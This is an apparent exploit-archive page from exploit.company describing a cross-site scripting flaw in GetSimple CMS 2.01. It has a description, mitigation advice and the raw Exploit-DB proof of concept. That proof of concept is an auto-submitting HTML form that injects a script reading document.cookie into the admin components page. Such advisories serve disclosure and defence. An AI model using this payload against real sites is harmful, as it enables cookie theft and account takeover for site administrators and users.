Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Cross-Site Scripting in GetSimple CMS - exploit.company
header-logo
Suggest Exploit
vendor:
GetSimple CMS
by:
7.5
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: GetSimple CMS
Affected Version From: 02.01
Affected Version To: 02.01
Patch Exists: No
Related CWE:
CPE: a:getsimple:getsimple_cms:2.01
Metasploit:
Other Scripts:
Platforms Tested:

Cross-Site Scripting in GetSimple CMS

GetSimple CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user-supplied input before using it in web applications. Developers should implement proper input validation techniques, such as whitelisting or input filtering, to prevent XSS attacks. Additionally, using output encoding functions when displaying user input can help prevent the execution of malicious scripts.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40374/info

GetSimple CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

GetSimple CMS 2.01 is vulnerable; prior versions may also be affected.

<form action="http://www.example.com/admin/components.php" method="post" name="main" accept-charset="utf-8" >
	<input type="hidden" name="submitted" value="Save Components" />
	<input name="val[]" type="hidden" value='Some text here..."><script>alert(document.cookie)</script>' />
	<input type="hidden" name="slug[]" value="sidebar" />
	<input type="hidden" name="title[]" value="Sidebar" />
	<input type="hidden" name="id[]" value="0" />
	<input type="hidden" name="val[]" value="Just Another GetSimple Website" />
	<input type="hidden" name="slug[]" value="tagline" />
	<input type="hidden" name="title[]" value="Tagline" />
	<input type="hidden" name="id[]" value="1" />
</form>
<script>
document.main.submit();
</script>